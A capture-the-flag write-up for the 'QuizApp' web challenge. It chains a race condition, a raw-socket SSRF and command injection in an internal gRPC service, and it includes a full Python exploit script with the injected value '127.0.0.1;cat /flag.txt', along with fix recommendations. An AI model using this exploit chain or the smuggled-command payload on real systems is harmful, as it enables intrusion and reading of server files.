QuizApp#

Challenge Info#

Name: QuizApp
Category: Web
Difficulty: Hard
Points: 150
Flag format: VBD{...}
Instance used: http://ctf.vulnbydefault.com:5484

TL;DR#

Exploit chain is:

Race condition in submit.php to gain more than +10 points for a single question.
Reach 100+ score to unlock profile image update path.
Abuse hidden avatar_url in profile.php for SSRF with raw socket write to internal service 127.0.0.1:50051.
Speak HTTP/2 + gRPC manually and inject shell command into monitor service:
- ip = "127.0.0.1;cat /flag.txt"
Server stores returned bytes as uploaded avatar; read /uploads/<random>.jpg and extract VBD{...}.

Root Cause Analysis#

1) Race condition in answer submission (`src/submit.php`)#

Code checks if question is already solved:
- SELECT COUNT(*) FROM solved_questions WHERE user_id = ? AND question_id = ?
If not solved, it sleeps (usleep(200000)), then evaluates answer and updates score.
There is no transaction / lock / unique constraint to prevent concurrent requests from passing the same check.

Impact:

Multiple parallel requests for the same question can all award points before solved state is consistently visible.

2) SSRF sink in profile update (`src/profile.php`)#

Hidden branch accepts POST avatar_url.
Uses parse_url() + fsockopen(host, port) and writes raw data derived from URL path:
- $data = urldecode(substr($path, 2));
- fwrite($fp, $data);
Reads response bytes and stores them as .jpg even for remote fetch ($is_remote = true).

Impact:

Arbitrary internal TCP interaction (SSRF-like raw socket) and response exfiltration through uploaded file.

3) Internal command injection in monitor (`monitor/main.go`)#

gRPC endpoint HealthCheck.CheckHealth runs:
- cmdStr := fmt.Sprintf("ping -c 1 %s", ip)
- exec.Command("sh", "-c", cmdStr)

Impact:

If attacker can reach this gRPC service, ip is command-injection primitive.

4) Service exposure / trust boundary issue#

Docker runs internal monitor on :50051 and web app in same container/network.
Web app can reach monitor via localhost.

Combined impact:

Remote attacker â†’ web app SSRF raw socket â†’ internal gRPC call â†’ command injection â†’ read /flag.txt.

Exploitation Steps (Manual)#

Register/login a normal user.
Trigger many parallel POSTs to /submit.php for the same question_id, trying both options repeatedly.
Repeat until score reaches at least 100.
POST to /profile.php with avatar_url containing percent-encoded HTTP/2 + gRPC request targeting:
- :path = /health.HealthCheck/CheckHealth
- protobuf field ip = "127.0.0.1;cat /flag.txt"
Open profile, get generated uploaded filename from <img src="uploads/<name>.jpg">.
Request /uploads/<name>.jpg and grep for VBD{...}.

Automated PoC Usage#

Exploit script file:

1. ctf/quizapp-web/exploit_quizapp.py

Run:

1
python "1. ctf/quizapp-web/exploit_quizapp.py" --base "http://ctf.vulnbydefault.com:5484"

Expected output includes:

score race progress
uploaded avatar filename
final flag line

Full Exploit Script#

1
#!/usr/bin/env python3
2
import argparse
3
import concurrent.futures
4
import random
5
import re
6
import secrets
7
import string
8
import sys
9
import time
10
import urllib.parse
11

12
import requests
13

14
try:
15
    import h2.connection
16
except Exception:
17
    print("[!] Missing dependency: h2 (pip install h2)")
18
    sys.exit(1)
19

20

21
def rand_user(prefix="u"):
22
    return f"{prefix}_{''.join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(8))}"
23

24

25
def must(cond, msg):
26
    if not cond:
27
        raise RuntimeError(msg)
28

29

30
def parse_score(html):
31
    m = re.search(r'id="user-score">\s*(\d+)\s*<', html)
32
    return int(m.group(1)) if m else 0
33

34

35
def parse_question_and_options(html):
36
    q = re.search(r"submitAnswer\((\d+), '((?:\\'|[^'])*)'\)", html)
37
    if not q:
38
        return None, []
39
    qid = int(q.group(1))
40
    opts = re.findall(r"submitAnswer\(%d, '((?:\\'|[^'])*)'\)" % qid, html)
41
    opts = [o.replace("\\'", "'") for o in opts]
42
    opts = list(dict.fromkeys(opts))
43
    return qid, opts
44

45

46
def encode_varint(n):
47
    out = bytearray()
48
    while True:
49
        b = n & 0x7F
50
        n >>= 7
51
        if n:
52
            out.append(b | 0x80)
53
        else:
54
            out.append(b)
55
            break
56
    return bytes(out)
57

58

59
def build_grpc_h2_payload(command_str):
60
    conn = h2.connection.H2Connection()
61
    conn.initiate_connection()
62
    raw = bytearray(conn.data_to_send())
63

64
    headers = [
65
        (":method", "POST"),
66
        (":scheme", "http"),
67
        (":path", "/health.HealthCheck/CheckHealth"),
68
        (":authority", "127.0.0.1:50051"),
69
        ("content-type", "application/grpc"),
70
        ("te", "trailers"),
71
    ]
72
    conn.send_headers(1, headers)
73

74
    msg = command_str.encode()
75
    proto = b"\x0a" + encode_varint(len(msg)) + msg
76
    grpc_body = b"\x00" + len(proto).to_bytes(4, "big") + proto
77

78
    conn.send_data(1, grpc_body, end_stream=True)
79
    raw.extend(conn.data_to_send())
80
    return bytes(raw)
81

82

83
def percent_encode_bytes(b):
84
    return "".join(f"%{x:02X}" for x in b)
85

86

87
def run(base):
88
    s = requests.Session()
89
    s.headers["User-Agent"] = "Mozilla/5.0"
90

91
    username = rand_user("quiz")
92
    password = "P@ssw0rd!" + ''.join(random.choice(string.digits) for _ in range(3))
93

94
    print(f"[*] Target: {base}")
95
    print(f"[*] User: {username}")
96

97
    r = s.post(
98
        f"{base}/auth.php",
99
        data={"action": "register", "username": username, "password": password},
100
        allow_redirects=True,
101
        timeout=20,
102
    )
103
    r.raise_for_status()
104

105
    r = s.post(
106
        f"{base}/auth.php",
107
        data={"action": "login", "username": username, "password": password},
108
        allow_redirects=True,
109
        timeout=20,
110
    )
111
    r.raise_for_status()
112
    must("Quiz" in r.text or "current score" in r.text.lower(), "Login failed")
113
    print("[+] Logged in")
114

115
    score = 0
116
    for round_no in range(1, 8):
117
        page = s.get(f"{base}/index.php", timeout=20)
118
        page.raise_for_status()
119
        score = parse_score(page.text)
120
        qid, opts = parse_question_and_options(page.text)
121

122
        print(f"[*] Round {round_no}: score={score}, qid={qid}, opts={opts}")
123
        if score >= 100:
124
            break
125
        if not qid or len(opts) < 1:
126
            break
127

128
        burst = []
129
        for _ in range(50):
130
            burst.append(opts[0])
131
            if len(opts) > 1:
132
                burst.append(opts[1])
133

134
        def hit(ans):
135
            try:
136
                rr = s.post(
137
                    f"{base}/submit.php",
138
                    data={"question_id": str(qid), "answer": ans},
139
                    timeout=20,
140
                )
141
                return rr.text
142
            except Exception:
143
                return ""
144

145
        with concurrent.futures.ThreadPoolExecutor(max_workers=40) as ex:
146
            results = list(ex.map(hit, burst))
147

148
        correct_count = sum('"status":"correct"' in x for x in results)
149
        print(f"[+] Burst done: correct={correct_count}/{len(results)}")
150
        time.sleep(1.0)
151

152
    page = s.get(f"{base}/index.php", timeout=20)
153
    page.raise_for_status()
154
    score = parse_score(page.text)
155
    print(f"[*] Final score after race: {score}")
156
    must(score >= 100, "Could not reach 100 points; rerun exploit")
157

158
    injected_ip = "127.0.0.1;cat /flag.txt"
159
    h2_payload = build_grpc_h2_payload(injected_ip)
160
    path_payload = "/x" + percent_encode_bytes(h2_payload)
161
    avatar_url = f"http://127.0.0.1:50051{path_payload}"
162

163
    print(f"[*] Sending SSRF to internal gRPC with injected ip: {injected_ip}")
164
    r = s.post(
165
        f"{base}/profile.php",
166
        data={"avatar_url": avatar_url},
167
        allow_redirects=True,
168
        timeout=30,
169
    )
170
    r.raise_for_status()
171

172
    prof = s.get(f"{base}/profile.php", timeout=20)
173
    prof.raise_for_status()
174

175
    m = re.search(r"uploads/([a-f0-9]{32}\.jpg)", prof.text)
176
    must(m is not None, "Could not find uploaded avatar filename")
177
    avatar_name = m.group(1)
178
    print(f"[+] Avatar file: {avatar_name}")
179

180
    blob = s.get(f"{base}/uploads/{avatar_name}", timeout=20).content
181
    text = blob.decode("latin1", errors="ignore")
182

183
    fm = re.search(r"VBD\{[^}]+\}", text)
184
    if fm:
185
        print(f"\n[FLAG] {fm.group(0)}")
186
        return
187

188
    print("[!] Flag not found directly in uploaded response.")
189
    print("[!] Response sample:")
190
    print(text[:1200])
191

192

193
if __name__ == "__main__":
194
    ap = argparse.ArgumentParser()
195
    ap.add_argument("--base", default="http://ctf.vulnbydefault.com:5484")
196
    args = ap.parse_args()
197
    run(args.base.rstrip("/"))

Flag#

VBD{grpc_with_g0ph3r_1s_b3st_8ce34e4dfe3390c372e49dbb61ad3242}

Fix Recommendations#

submit.php: use DB transaction + unique constraint (user_id, question_id) and atomic score update.
profile.php: remove avatar_url remote fetch path (or strict allowlist + safe HTTP client).
monitor/main.go: never shell-expand user input; use direct command args or pure ICMP library.
Isolate internal services from web app egress where possible.

QuizApp#

Challenge Info#

TL;DR#

Root Cause Analysis#

1) Race condition in answer submission (src/submit.php)#

2) SSRF sink in profile update (src/profile.php)#

3) Internal command injection in monitor (monitor/main.go)#

4) Service exposure / trust boundary issue#

Exploitation Steps (Manual)#

Automated PoC Usage#

Full Exploit Script#

Flag#

Fix Recommendations#

1) Race condition in answer submission (`src/submit.php`)#

2) SSRF sink in profile update (`src/profile.php`)#

3) Internal command injection in monitor (`monitor/main.go`)#